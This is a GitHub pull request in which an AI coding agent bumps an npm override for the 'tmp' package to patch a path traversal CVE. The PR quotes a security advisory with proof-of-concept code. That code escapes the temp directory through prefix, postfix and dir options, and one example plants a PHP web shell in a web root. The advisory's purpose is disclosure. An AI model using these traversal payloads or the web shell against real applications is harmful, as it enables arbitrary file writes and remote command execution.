
fix(ClientSPA): bump tmp override to ^0.2.7 (CVE-2026-44705 / GHSA-ph9p-34f9-6g65)#15938

Merged
mikeharder merged 4 commits into main from copilot/fix-path-traversal-vulnerability on Jun 5, 2026

Conversation

Contributor

Copilot AI commented Jun 5, 2026

tmp@0.2.5 has a path traversal vulnerability (CVE-2026-44705) where unsanitized prefix, postfix, or dir options allow file creation outside the intended temp directory.

Changes

  • package.json — advances the overrides["external-editor"]["tmp"] pin from ^0.2.5 to ^0.2.7
  • package-lock.json — regenerated; tmp now resolves to 0.2.7

tmp is a transitive dep of external-editor and is not called anywhere in application code, so there is no active exploit surface — this update clears the scanner alert.

Original prompt

This section details the Dependabot vulnerability alert you should resolve

<alert_title>tmp has Path Traversal via unsanitized prefix/postfix that enables directory escape</alert_title>
<alert_description>

Summary

The tmp npm package contains a path traversal vulnerability that allows escaping the intended temporary directory when untrusted data flows into the prefix, postfix, or dir options. By embedding traversal sequences (e.g., ../) or path separators in these parameters, attackers can cause files to be created outside the configured temporary base directory at attacker-controlled locations with the privileges of the running process. This vulnerability affects applications that pass user-controlled data to tmp's file/directory creation functions without proper input sanitization.

Details

Root Cause:
The vulnerability exists in tmp's path construction logic where user-supplied options are directly concatenated into file paths without sanitization or validation.

Technical Flow:

  1. Filename Construction: tmp builds filenames as <prefix>-<pid>-<random>-<postfix>
  2. Path Composition: Final path computed as path.join(tmpDir, opts.dir, name)
  3. Path Normalization: Node.js path.join() normalizes traversal sequences, allowing escape
  4. File Creation: File created at the resulting (potentially escaped) path

Vulnerable Pattern:

// In tmp package internals
const name = `${opts.prefix || ''}-${process.pid}-${randomString}-${opts.postfix || ''}`;
const finalPath = path.join(tmpDir, opts.dir || '', name);
// No validation that finalPath remains within tmpDir

Path Traversal Mechanics:

  • prefix/postfix traversal: ../../../evil in prefix escapes directory structure
  • Absolute path bypass: If opts.dir is absolute, path.join() ignores tmpDir completely
  • Normalization exploitation: path.join() resolves ../ sequences regardless of surrounding text
  • Cross-platform impact: Works on Windows (..\\), Unix (../), and mixed path systems

Key Vulnerability Points:

  • No input validation on prefix, postfix, or dir parameters
  • Direct use of user input in path construction
  • Reliance on path.join() normalization without containment checks
  • Missing post-construction validation that final path remains within intended directory

PoC

Basic Path Traversal via prefix:

const tmp = require('tmp');
const path = require('path');
const fs = require('fs');

// Create a controlled base directory
const baseDir = fs.mkdtempSync('/tmp/safe-base-');
console.log('Base directory:', baseDir);

// Escape via prefix
tmp.file({ 
  tmpdir: baseDir, 
  prefix: '../escaped' 
}, (err, filepath, fd, cleanup) => {
  if (err) throw err;
  
  console.log('Created file:', filepath);
  console.log('Relative to base:', path.relative(baseDir, filepath));
  // Output shows: ../escaped-<pid>-<random>
  
  cleanup();
});

Directory Escape via postfix:

tmp.file({ 
  tmpdir: baseDir, 
  postfix: '/../../pwned.txt' 
}, (err, filepath, fd, cleanup) => {
  if (err) throw err;
  
  console.log('Escaped file:', filepath);
  console.log('Escaped outside base:', !filepath.startsWith(baseDir));
  
  cleanup();
});

Absolute Path Bypass via dir:

tmp.file({ 
  tmpdir: '/safe/tmp/dir', 
  dir: '/tmp/evil-location',
  prefix: 'bypassed'
}, (err, filepath, fd, cleanup) => {
  if (err) throw err;
  
  console.log('Bypassed to:', filepath);
  // File created in /tmp/evil-location instead of /safe/tmp/dir
  
  cleanup();
});

Advanced Multi-Vector Attack:

const maliciousOpts = {
  tmpdir: '/app/safe-tmp',
  dir: '../../../tmp',           // Escape base
  prefix: '../sensitive-area/',   // Further traversal
  postfix: 'malicious.config'     // Controlled filename
};

tmp.file(maliciousOpts, (err, filepath, fd, cleanup) => {
  // Results in file creation at: /tmp/sensitive-area/malicious.config
  console.log('Final malicious path:', filepath);
  cleanup();
});

Real-World Attack Simulation:

// Simulate web API that accepts user file prefix
function createUserTempFile(userPrefix, content) {
  return new Promise((resolve, reject) => {
    tmp.file({ prefix: userPrefix }, (err, path, fd, cleanup) => {
      if (err) return reject(err);
      
      fs.writeSync(fd, content);
      console.log('User file created at:', path);
      resolve({ path, cleanup });
    });
  });
}

// Attacker input
const attackerPrefix = '../../../var/www/html/backdoor';
createUserTempFile(attackerPrefix, '<?php system($_GET["cmd"]); ?>');
// Creates PHP backdoor in web root instead of temp directory

Impact

Arbitrary File Creation:

  • Files created outside intended temporary directories
  • Attacker control over file placement location
  • Potential to overwrite existing files (depending on creation flags)
  • Cross-platform exploitation capability

**Attack Scenarios:...


Co-authored-by: mikeharder <9459391+mikeharder@users.noreply.github.com>
Copilot AI changed the title from "[WIP] Fix path traversal vulnerability in tmp package" to "fix(ClientSPA): bump tmp override to ^0.2.6 (CVE-2026-44705 / GHSA-ph9p-34f9-6g65)" on Jun 5, 2026
Copilot AI requested a review from mikeharder June 5, 2026 00:58
Comment thread on src/dotnet/APIView/ClientSPA/package.json (outdated)
@mikeharder mikeharder marked this pull request as ready for review June 5, 2026 16:07
@mikeharder mikeharder requested a review from tjprescott as a code owner June 5, 2026 16:07
Copilot AI review requested due to automatic review settings June 5, 2026 16:07
Contributor

Copilot AI left a comment


Pull request overview

Updates the APIView ClientSPA npm dependency resolution to address the tmp path traversal vulnerability (CVE-2026-44705 / GHSA-ph9p-34f9-6g65) by forcing a patched tmp version via npm overrides and regenerating the lockfile to reflect the resolved version.

Changes:

  • Bumped the overrides.external-editor.tmp constraint to a patched tmp version range.
  • Regenerated package-lock.json so tmp resolves to 0.2.7.

Reviewed changes

Copilot reviewed 1 out of 2 changed files in this pull request and generated 1 comment.

Reviewed files:

  • src/dotnet/APIView/ClientSPA/package.json: updates the npm override for external-editor’s transitive tmp dependency.
  • src/dotnet/APIView/ClientSPA/package-lock.json: reflects the updated resolution to tmp@0.2.7 after lockfile regeneration.
Files not reviewed (1)
  • src/dotnet/APIView/ClientSPA/package-lock.json: Language not supported

Comment on lines 93 to 95
"external-editor": {
"tmp": "^0.2.5"
"tmp": "^0.2.7"
}
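Review bot: this override is keyed under "external-editor", so it only rewrites the tmp that external-editor depends on; any other package in the tree that pulls in tmp keeps its own resolution and is not covered by the bump to "^0.2.7". Please confirm with `npm ls tmp` against the regenerated lockfile that 0.2.7 is the only installed copy, and note that in the PR description alongside the "tmp now resolves to 0.2.7" line so the scanner alert is not just suppressed for one path.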
Copilot AI requested a review from mikeharder June 5, 2026 16:14
@mikeharder mikeharder changed the title from "fix(ClientSPA): bump tmp override to ^0.2.6 (CVE-2026-44705 / GHSA-ph9p-34f9-6g65)" to "fix(ClientSPA): bump tmp override to ^0.2.7 (CVE-2026-44705 / GHSA-ph9p-34f9-6g65)" on Jun 5, 2026
@mikeharder mikeharder merged commit 2bc6502 into main Jun 5, 2026
11 checks passed
@mikeharder mikeharder deleted the copilot/fix-path-traversal-vulnerability branch June 5, 2026 16:28